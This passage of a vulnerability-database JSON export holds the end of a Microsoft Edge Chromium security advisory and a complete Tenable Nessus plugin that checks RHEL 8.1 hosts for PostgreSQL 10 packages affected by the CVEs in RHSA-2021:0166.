[CVE-2020-6402](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6402>), [CVE-2020-6404](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6404>), [CVE-2020-6405](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-220-6405>), [CVE-2020-6406](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6406>), [CVE-2019-19923](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19923>), [CVE-2020-6408](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6408>), [CVE-2020-6409](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6409>), [CVE-2020-6410](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6410>), [CVE-2020-6411](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6411>), [CVE-2020-6412](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6412>), [CVE-2020-6413](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6413>), [CVE-2020-6414](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6414>), [CVE-2020-6415](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6415>), [CVE-2020-6416](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6416>), [CVE-2020-6417](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6417>) \n79.0.309.68 | 1/17/2020 | 79.0.3945.130 | Critical | [CVE-2020-6378](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6378>), [CVE-2020-6379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6379>), [CVE-2020-6380](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6380>), [CVE-2020-0601](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0601>) \n \n* CVE\u2019s in **bold** have been reported to be exploited in the wild.\n\n**How can I see the version of the browser?**\n\n 1. In your Microsoft Edge browser, click on the 3 dots (...) on the very right-hand side of the window\n 2. Click on **Help and Feedback**\n 3. Click on **About Microsoft Edge**\n", "edition": 33, "modified": "2021-01-21T08:00:00", "id": "MS:ADV200002", "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200002", "published": "2021-01-21T08:00:00", "title": "Chromium Security Updates for Microsoft Edge (Chromium-Based)", "type": "mscve", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-22T13:35:39", "description": "The remote Redhat Enterprise Linux 8 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the RHSA-2021:0166 advisory.\n\n - postgresql: Selectivity estimators bypass row security policies (CVE-2019-10130)\n\n - postgresql: Stack-based buffer overflow via setting a password (CVE-2019-10164)\n\n - postgresql: TYPE in pg_temp executes arbitrary SQL during SECURITY DEFINER execution (CVE-2019-10208)\n\n - postgresql: Uncontrolled search path element in logical replication (CVE-2020-14349)\n\n - postgresql: Uncontrolled search path element in CREATE EXTENSION (CVE-2020-14350)\n\n - postgresql: ALTER ... DEPENDS ON EXTENSION is missing authorization checks (CVE-2020-1720)\n\n - postgresql: Reconnection can downgrade connection security settings (CVE-2020-25694)\n\n - postgresql: Multiple features escape security restricted operation sandbox (CVE-2020-25695)\n\n - postgresql: psql's \\gset allows overwriting specially treated variables (CVE-2020-25696)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 1, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-01-21T00:00:00", "title": "RHEL 8 : postgresql:10 (RHSA-2021:0166)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-25695", "CVE-2019-10208", "CVE-2019-10130", "CVE-2020-25694", "CVE-2020-14350", "CVE-2020-25696", "CVE-2020-1720", "CVE-2020-14349", "CVE-2019-10164"], "modified": "2021-01-21T00:00:00", "cpe": ["cpe:/o:redhat:rhel_eus:8.1", "p-cpe:/a:redhat:enterprise_linux:postgresql-plperl", "p-cpe:/a:redhat:enterprise_linux:postgresql-server-devel", "cpe:/a:redhat:rhel_eus:8.1::appstream", "p-cpe:/a:redhat:enterprise_linux:postgresql-upgrade", "p-cpe:/a:redhat:enterprise_linux:postgresql-test-rpm-macros", "p-cpe:/a:redhat:enterprise_linux:postgresql-upgrade-devel", "p-cpe:/a:redhat:enterprise_linux:postgresql-plpython3", "cpe:/o:redhat:rhel_e4s:8.1", "p-cpe:/a:redhat:enterprise_linux:postgresql-pltcl", "p-cpe:/a:redhat:enterprise_linux:postgresql-static", "p-cpe:/a:redhat:enterprise_linux:postgresql-docs", "cpe:/a:redhat:rhel_e4s:8.1::appstream", "p-cpe:/a:redhat:enterprise_linux:postgresql", "p-cpe:/a:redhat:enterprise_linux:postgresql-server", "p-cpe:/a:redhat:enterprise_linux:postgresql-test", "p-cpe:/a:redhat:enterprise_linux:postgresql-contrib"], "id": "REDHAT-RHSA-2021-0166.NASL", "href": "https://www.tenable.com/plugins/nessus/145243", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2021:0166. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(145243);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/21\");\n\n script_cve_id(\n \"CVE-2019-10130\",\n \"CVE-2019-10164\",\n \"CVE-2019-10208\",\n \"CVE-2020-1720\",\n \"CVE-2020-14349\",\n \"CVE-2020-14350\",\n \"CVE-2020-25694\",\n \"CVE-2020-25695\",\n \"CVE-2020-25696\"\n );\n script_bugtraq_id(108452, 108875);\n script_xref(name:\"RHSA\", value:\"2021:0166\");\n\n script_name(english:\"RHEL 8 : postgresql:10 (RHSA-2021:0166)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 8 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the RHSA-2021:0166 advisory.\n\n - postgresql: Selectivity estimators bypass row security policies (CVE-2019-10130)\n\n - postgresql: Stack-based buffer overflow via setting a password (CVE-2019-10164)\n\n - postgresql: TYPE in pg_temp executes arbitrary SQL during SECURITY DEFINER execution (CVE-2019-10208)\n\n - postgresql: Uncontrolled search path element in logical replication (CVE-2020-14349)\n\n - postgresql: Uncontrolled search path element in CREATE EXTENSION (CVE-2020-14350)\n\n - postgresql: ALTER ... DEPENDS ON EXTENSION is missing authorization checks (CVE-2020-1720)\n\n - postgresql: Reconnection can downgrade connection security settings (CVE-2020-25694)\n\n - postgresql: Multiple features escape security restricted operation sandbox (CVE-2020-25695)\n\n - postgresql: psql's \\gset allows overwriting specially treated variables (CVE-2020-25696)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/20.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/89.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/121.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/183.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/270.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/284.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/285.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/327.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-10130\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-10164\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2019-10208\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-1720\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-14349\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-14350\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-25694\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-25695\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-25696\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2021:0166\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1707109\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1719698\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1734416\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1798852\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1865744\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1865746\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1894423\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1894425\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1894430\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-10164\");\n script_cwe_id(20, 89, 121, 183, 270, 284, 285, 327);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/05/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_e4s:8.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_eus:8.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:rhel_e4s:8.1::appstream\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:rhel_eus:8.1::appstream\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:postgresql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:postgresql-contrib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:postgresql-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:postgresql-plperl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:postgresql-plpython3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:postgresql-pltcl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:postgresql-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:postgresql-server-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:postgresql-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:postgresql-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:postgresql-test-rpm-macros\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:postgresql-upgrade\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:postgresql-upgrade-devel\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/RedHat/release');\nif (isnull(release) || 'Red Hat' >!< release) audit(AUDIT_OS_NOT, 'Red Hat');\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release(operator: 'eq', os_version: os_ver, rhel_version: '8.1')) audit(AUDIT_OS_NOT, 'Red Hat 8.1', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nrepositories = {\n 'rhel_e4s_8_1_appstream': [\n 'rhel-8-for-x86_64-appstream-e4s-debug-rpms',\n 'rhel-8-for-x86_64-appstream-e4s-debug-rpms__8_DOT_1',\n 'rhel-8-for-x86_64-appstream-e4s-rpms',\n 'rhel-8-for-x86_64-appstream-e4s-rpms__8_DOT_1',\n 'rhel-8-for-x86_64-appstream-e4s-source-rpms',\n 'rhel-8-for-x86_64-appstream-e4s-source-rpms__8_DOT_1'\n ],\n 'rhel_eus_8_1_appstream': [\n 'rhel-8-for-aarch64-appstream-eus-debug-rpms',\n 'rhel-8-for-aarch64-appstream-eus-debug-rpms__8_DOT_1',\n 'rhel-8-for-aarch64-appstream-eus-rpms',\n 'rhel-8-for-aarch64-appstream-eus-rpms__8_DOT_1',\n 'rhel-8-for-aarch64-appstream-eus-source-rpms',\n 'rhel-8-for-aarch64-appstream-eus-source-rpms__8_DOT_1',\n 'rhel-8-for-s390x-appstream-eus-debug-rpms',\n 'rhel-8-for-s390x-appstream-eus-debug-rpms__8_DOT_1',\n 'rhel-8-for-s390x-appstream-eus-rpms',\n 'rhel-8-for-s390x-appstream-eus-rpms__8_DOT_1',\n 'rhel-8-for-s390x-appstream-eus-source-rpms',\n 'rhel-8-for-s390x-appstream-eus-source-rpms__8_DOT_1',\n 'rhel-8-for-x86_64-appstream-e4s-debug-rpms',\n 'rhel-8-for-x86_64-appstream-e4s-rpms',\n 'rhel-8-for-x86_64-appstream-e4s-source-rpms',\n 'rhel-8-for-x86_64-appstream-eus-debug-rpms',\n 'rhel-8-for-x86_64-appstream-eus-debug-rpms__8_DOT_1',\n 'rhel-8-for-x86_64-appstream-eus-rpms',\n 'rhel-8-for-x86_64-appstream-eus-rpms__8_DOT_1',\n 'rhel-8-for-x86_64-appstream-eus-source-rpms',\n 'rhel-8-for-x86_64-appstream-eus-source-rpms__8_DOT_1'\n ]\n};\n\nfound_repos = NULL;\nhost_repo_list = get_kb_list('Host/RedHat/repo-list/*');\nif (!(empty_or_null(host_repo_list))) {\n found_repos = make_list();\n foreach repo_key (keys(repositories)) {\n foreach repo ( repositories[repo_key] ) {\n if (get_kb_item('Host/RedHat/repo-list/' + repo)) {\n append_element(var:found_repos, value:repo_key);\n break;\n }\n }\n }\n if(empty_or_null(found_repos)) audit(AUDIT_RHSA_NOT_AFFECTED, 'RHSA-2021:0166');\n}\n\nmodule_ver = get_kb_item('Host/RedHat/appstream/postgresql');\nif (isnull(module_ver)) audit(AUDIT_PACKAGE_NOT_INSTALLED, 'Module postgresql:10');\nif ('10' >!< module_ver) audit(AUDIT_PACKAGE_NOT_AFFECTED, 'Module postgresql:' + module_ver);\n\nappstreams = {\n 'postgresql:10': [\n {'reference':'postgresql-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-contrib-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-contrib-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-contrib-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-docs-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-docs-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-docs-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-plperl-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-plperl-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-plperl-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-plpython3-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-plpython3-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-plpython3-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-pltcl-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-pltcl-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-pltcl-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-server-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-server-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-server-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-server-devel-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-server-devel-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-server-devel-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-static-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-static-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-static-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-test-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-test-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-test-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-test-rpm-macros-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-test-rpm-macros-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-test-rpm-macros-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-upgrade-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-upgrade-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-upgrade-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-upgrade-devel-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-upgrade-devel-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']},\n {'reference':'postgresql-upgrade-devel-10.15-1.module+el8.1.0+9154+cd474635', 'sp':'1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_eus_8_1_appstream']}\n ]\n};\n\nflag = 0;\nappstreams_found = 0;\nforeach module (keys(appstreams)) {\n appstream = NULL;\n appstream_name = NULL;\n appstream_version = NULL;\n appstream_split = split(module, sep:':', keep:FALSE);\n if (!empty_or_null(appstream_split)) {\n appstream_name = appstream_split[0];\n appstream_version = appstream_split[1];\n if (!empty_or_null(appstream_name)) appstream = get_one_kb_item('Host/RedHat/appstream/' + appstream_name);\n }\n if (!empty_or_null(appstream) && appstream_version == appstream || appstream_name == 'all') {\n appstreams_found++;\n foreach package_array ( appstreams[module] ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n repo_list = NULL;\n if (!empty_or_null(package_array['repo_list'])) repo_list = package_array['repo_list'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'RHEL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n repocheck = FALSE;\n if (empty_or_null(found_repos))\n {\n repocheck = TRUE;\n }\n else\n {\n foreach repo (repo_list) {\n if (contains_element(var:found_repos, value:repo))\n {\n repocheck = TRUE;\n break;\n }\n }\n }\n if (repocheck && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n }\n }\n}\n\nif (!appstreams_found) audit(AUDIT_PACKAGE_NOT_INSTALLED, 'Module postgresql:10');\n\nif (flag)\n{\n if (empty_or_null(host_repo_list)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get();\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'postgresql / postgresql-contrib / postgresql-docs / postgresql-plperl / etc');\n}\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-01-22T13:35:40", "description": "The remote Redhat Enterprise Linux 8 host has packages installed that are affected by a vulnerability as referenced in\nthe RHSA-2021:0189 